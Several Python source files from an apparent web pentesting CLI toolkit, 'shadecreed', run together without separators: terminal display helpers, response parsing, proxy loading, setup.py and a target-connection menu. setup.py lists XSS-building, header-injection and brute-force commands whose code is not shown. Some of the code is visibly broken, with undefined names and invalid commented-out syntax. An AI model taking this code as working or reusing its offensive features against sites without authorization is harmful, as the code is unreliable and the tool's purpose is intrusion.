  time.sleep(timeout)
  if len(te) <= width:
    sys.stdout.write(f'\r' + ' ' * width + '\r')
    if reverse:
      sys.stdout.write(f'\x1b[1A' + ' ' * width + '\r')
  else:
    total = width // len(te)
    sys.stdout.write(f'\x1b[{total}A' + ' ' * width + '\r')
  sys.stdout.write(plain)
  
def wrloader(ti=5):
  sys.stdout.write('\r')
  for i in range(ti+1):
    sys.stdout.write(f'\r{green}' + ['.'][0] * i)
    time.sleep(1)
  sys.stdout.write(f'\r{plain}')
  
"""
def wrsplit(te,de,ti=0.003):
  for i in range(20):
    for t,d in zip(te,de):
      sys.stdout.write(f'\x1b[1;31m{t[:+i]}\x1b[1;0m' + '\n' if i == 10 else t)
      sys.stdout.write(' '+=i '|' if i == 10 + f'\x1b[1;33m{d[:+i]}\x1b[1;0m')
    
    sys.stdout.write('\n')
"""  
def wrcom(dictone, dicttwo, ti=0.005):
  if isinstance(dictone, dict) and isinstance(dicttwo, dict):
    for key in dicttwo.keys():
      if key in dictone.keys():
        val1 = dictone[key]
        val2 = dicttwo[key]
        if val1 != val2:
          sys.stdout.write(f'{key} : {yellow}{val2}{plain}')
        else:
          sys.stdout.write(f'{key} : {val2}')
      
      
      
def wrdic(dict_,co=plain,ti=0.002,mi=False):
  if isinstance(dict_,dict):
    for k, v in dict_.items():
      if mi:
        sys.stdout.write(f'{co}%s{plain} : %s\n'%(k,v[:20]))
      else:
        sys.stdout.write(f'{co}%s{plain} : %s\n'%(k,v))
      sys.stdout.flush()
      time.sleep(ti)
    sys.stdout.write(f'\n')
  else:
    wr(dict_)
if __name__=='__main__':
  wrdel('Not a standalone', 'Buzz off fam')


import re,os,json,threading,datetime
from bs4 import BeautifulSoup as bs
from shadecreed.ux.anime import wr,wrdic,wrcom
from shadecreed.core.headers.network.proxy import readCache
from shadecreed.core.utils.base import base_dir,cache_dir,stream_dir,onload_file

key_headers = ['Location', 'Set-Cookie', 'Content-Security-Policy', 'Access-Control-Allow-Origin']

def skim(target):
  if target.startswith('http'):
    try:
      host, end = target.split('.',1)
      proto, dns = host.split('//',1)
      return dns
    except Exception:
      return None
      
def processResponse(response):
  cache = readCache()
  custom_headers = onload_file(f'{base_dir}/core/headers/map.json')
  available = dict()
  if response.status_code:
    available['[+] Status code'] = response.status_code
  if response.encoding:
    available['[+] Encoding'] = response.encoding
  if response.elapsed:
    available['[+] Elapsed time'] = response.elapsed  
  if response.url:
    available['[+] Final url'] = response.url
  if response.history:
    available['[+] Status history'] = [x.status_code for x in response.history]
  if response.cookies:
    available['[+] Cookies'] = response.cookies
  if response.content:
    available['[+] Content (byte)'] = len(response.content)
    #if len(response.content) < int(cache['content-size']):
     # wr('[+] Noticeable change in content size ✅')
      #ask = input('[+] Would you like to observe this `Yes/No`: ')
     # if ask.lower() == 'yes':
     #   content = readCache(content=True)
      #  wr(response.text[:300],ti=0.0005)
    #  else:
       # pass
  try:
    if custom_headers['host'] in response.text:
      wr(f'{cache['host']} spotted in page body')
  except Exception:
    pass
  
  for key in response.headers:
    if key in key_headers:
      available[key] = value
      
  wrdic(available)
  
def processContent(response,saveTo):
  use_cache = readCache()
  if 'html' in use_cache['content-type']:
    html = bs(response.text, 'html.parser')
    wr(f'[+] Page content type : {use_cache['content-type']} 📜')
    if saveTo:
      with open(saveTo,'w') as save:
        save.write(html.prettify())
        save.close()
      
  else:
    wr(f'[+] Page content type : {use_cache['content-type']} 📜')
  wr(f'[+] Page elapsed time : {use_cache['elapsed-time']}')
  wr(f'[+] Page content size (byte) : {len(response.content)} 📜')
  
class streamData:
  def __init__(self,data,streamed=None):
    self.data = data if isinstance(data, dict) else dict(data)
    self.streamed = streamed if streamed != None else dict()
    self.keep_alive = None
    self.process()
    
  def writejson(self):
    with open(f'{stream_dir}/streamed.json', 'w') as write:
      json.dump(f'{{}}', write)
      
  def process(self):
    if os.path.exists(f'{base_dir}/core/middleware/process.json'):
      status = onload_file(f'{base_dir}/core/middleware/process.json')
      self.keep_alive = status['keep-alive']
    else:
       self.keep_alive = False
      
  def streaming(self):
    if isinstance(self.data, dict):
      for key, value in self.data.items():
        if self.keep_alive:
          wr('%s : %s'%(key, value))
      
  def conclude(self):
    while True:
      if os.path.exists(f'{stream_dir}/streamed.json'):
        try:
          existing_data = onload_file(f'{stream_dir}/streamed.json')
          with open(f'{stream_dir}/streamed.json', 'w') as rewrite:
            existing_data.update(self.streamed)
            json.dump(existing_data, rewrite, indent=2)
            break
        except Exception as error:
          print(error)
          self.writejson()
      else:
        self.writejson()
        
    


import httpx,random,os,json
from shadecreed.ux.anime import wr
from shadecreed.core.utils.base import base_dir,cache_dir

def proxUse():
  if os.path.exists(f'{base_dir}/proxy.txt'):
    with open(f'{base_dir}/proxy.txt', 'r') as format_:
      line = [line.strip() for line in format_.readlines() if line]
      return line
  else:
    return None        
    
def proxyParse(use):
  if use is not None:
    return {'http://' : f'http://{use}','https://' : f'https://{use}'}
  else:
    return None


def readCache(content=False):
  if content == False:
    with open(f'{cache_dir}/cache.json','r') as file:
      cache = json.load(file)
      return cache
  else:
    if os.path.exists(f'{cache_dir}/page.html'):
      with open(f'{cache_dir}/page.html') as content:
        return content.read()
    else:
      return None
    
def proxyTest():
  proxyused,instance,config = proxyParse(),readCache(),map()
  for _ in range(5):
    try:
      test = httpx.request(config.get('method', 'GET').upper(), instance['target'], proxy=proxyused, timeout=5,follow_redirects=True)
      if proxyused and test.status_code == 200:
        wr('\033[1;32m[+] Connection Secured ✅ \033[1;0m]')
        return proxyused
    except Exception:
      continue
  
  return None


from setuptools import setup, find_packages

setup(
    name="shadecreed",
    version="0.13.6",
    description="A CLI framework for web application assessments and penetration testing — built with modularity, continuous maintenance, and frequent updates in mind.",
    author="Shade",
    author_email="adesolasherifdeen3@gmail.com",
    packages=find_packages(),
    install_requires=[
        'httpx',
        'html5lib',
        'jinja2',
        'selenium==4.9.1',
        'beautifulsoup4',
    ],
    entry_points={
        "console_scripts": [
            "shadecreed=shadecreed.__main__:start",
            "shadecreed-scan=shadecreed.core.utils.build:runAnalyzeHeaders",
            "shadecreed-xss=shadecreed.core.utils.build:runBuildXss",
            "shadecreed-inject=shadecreed.core.headers.argue:runHeaderEditor",
            "shadecreed-brute=shadecreed.core.utils.assemble:runStartAssembling",
            "shadecreed-test=shadecreed.__test__:send_json",
        ]
    },
    include_package_data=True,
    python_requires='>=3.11',
    license="GPL-3.0",
    classifiers=[
        "License :: OSI Approved :: GNU General Public License v3 (GPLv3)",
        "Programming Language :: Python :: 3",
        "Programming Language :: Python :: 3.11",
        "Operating System :: OS Independent",
    ],
    project_urls={
        "GitHub": "https://github.com/harkerbyte",
        "Facebook": "https://facebook.com/harkerbyte",
        "Whatsapp" : "https://whatsapp.com/channel/0029Vb5f98Z90x2p6S1rhT0S",
        "Youtube" : "https://youtube.com/@harkerbyte",
        "Instagram": "https://instagram.com/harkerbyte"
    },
    long_description=open("README.md", encoding="utf-8").read(),
    long_description_content_type="text/markdown",
)


import os,httpx,sys,threading,time,argparse,subprocess
from bs4 import BeautifulSoup as bs
from shadecreed.cache.cache import cache
from shadecreed.ux.anime import wr,wrdel,wrdic,wrcold
from shadecreed.ux.ascii import banner,menu
from shadecreed.core.headers.argue import headerEditor
from shadecreed.core.utils.assemble import startAssembling
from shadecreed.core.middleware.drive import drive
from shadecreed.core.utils.build import buildXss
from shadecreed.core.utils.base import base_dir,cache_dir
gr = '\033[1;32m'
pl = '\033[1;0m'
ye = '\033[1;33m'
sp = """
 _, __, _,  _ _, _ ___ __, __,
(_  |_) |   | |\\ |  |  |_  |_)
, ) |   | , | | \\|  |  |   | \\
 ~  ~   ~~~ ~ ~  ~  ~  ~~~ ~ ~
"""

class main:
  def __init__(self,target):
    self.target = target
    self.sl(banner())
    self.sl(menu(self.target))
    self.cont()
   
  def sl(self,te,ti=0.0003):
    for ie in te:
      sys.stdout.write(ie)
      sys.stdout.flush()
      time.sleep(ti)
    sys.stdout.write(pl+'\n')
  
  def sldel(self,te,re,ti=0.005):
    for ie in te:
      sys.stdout.write(ie)
      sys.stdout.flush()
      time.sleep(ti)
      
    sys.stdout.write(f'\r')
    for i in range(len(re)):
      sys.stdout.write(f'\r{re[:i+1]}' + ' ' * (len(te)-i-1))
      sys.stdout.flush()
      time.sleep(ti)
    sys.stdout.write('\n')
  
  def fiforms(self,res,read='[+] Scanning for forms'):
    global ac_forms
    for parser in ['html.parser','html5lib']:
      inspect = bs(res.text, parser)
      ac_forms =  inspect.find_all('form')
      if ac_forms:
        break
    if ac_forms:
      self.sldel(read,'[+] Forms were found ✅')
    else:
      self.sldel(read, '[-] No forms were found ❌')
    
  def cont(self):
    try:
      self.sl('[+] Attempting to establish an initial connection',ti=0.005)
      re = httpx.request('GET',self.target,follow_redirects=True)
      if re.status_code == 200:
        self.sl('[+] Connection established ✅')
      self.fiforms(re)
      global cache
      cache = cache(self.target,re.headers,re)
    except Exception as er:
      print(er)
      sys.exit()

def start():
  parse = argparse.ArgumentParser(description="A cli web application pentesting toolkit. Seem you intend to start the whole framework, that\'s great 🗿")
  parse.add_argument('-u','--url',help="<target_url>",required=True)
  parse.add_argument('-v','--version',action="version",version="shadecreed - 0.13.6",help="Display framework version")
  args = parse.parse_args()
  
  if args.url:
    if args.url.startswith('http'):
      main(args.url)
    else:
      wr(f'{args.url} is an invalid http address')
      sys.exit()
  
    sys.stdout.write('\n')
    while True:
      opt = input('>>> ').strip()
      if opt.lower() == 'h':
        if cache.active():
          headerEditor()
      elif opt.lower() == 'b':
        if ac_forms:
          document = open(f'{cache_dir}/page.html','r')
          startAssembling(document)
        else:
          wrcold('No forms was detected on the page',co='\x1b[1;31m',timeout=1.5)
      elif opt.lower() == 'x':
        buildXss()
      elif opt.lower() == 'j':
        subprocess.run(['xdg-open', 'https://whatsapp.com/channel/0029Vb5f98Z90x2p6S1rhT0S'])
      elif opt.lower() == 'q':
        cache.clear()
      elif opt != '':
        wrcold(f'{opt} is an unknown command',co='\x1b[1;31m',reverse=True)      
if __name__ == "__main__":
  pass
      
  


import os,sys,json,argparse
from pathlib import Path
from shadecreed.ux.anime import wr,wrdic

#Fixed dirs
navigate = Path.home()
home_dir = navigate / ".shadecreed" / "logs"
stream_dir = home_dir / "stream"

#Temp dirs
base_dir = Path(__file__).resolve().parents[2]
cache_dir = base_dir / 'cache'
password_dir = base_dir / 'path'


def onload_file(onload):
  if os.path.isfile(onload):
    if '/' in onload:
      target = onload.split('/')[-1:]
      file = target[0]
    name, ext = os.path.splitext(file)
    if ext == '.json':
      with open(onload, 'r') as loaded:
        try:
          return json.load(loaded)
        except JSONDecodeError:
          return '{}'
    else:
      wr(f'{file.split('/')[-1:]} carries an invalid extension for a json document')
      sys.exit()
  else:
    raise FileNotFoundError(f'{onload} was not found')

"""    
def readXssLog():
  parse = argparse.ArgumentParser(description="Read xss captured datas")
  parse.add_argument('-r','--read',help="Provide the number of recent datas to display - LIFO")
  args = parse.parse_args()
  
  if os.path.exists(stream_dir / 'streamed.json'):
    retrieved = onload_file(stream_dir / 'streamed.json')
    if args.read and args.read >= 1:
      Lifo = retrieved.items()[-args.read:]
    else:
      Lifo = retrieved.items()[-5:]
      
    wrdic(Lifo)
  else:
    wr(f'There are no existing log')
"""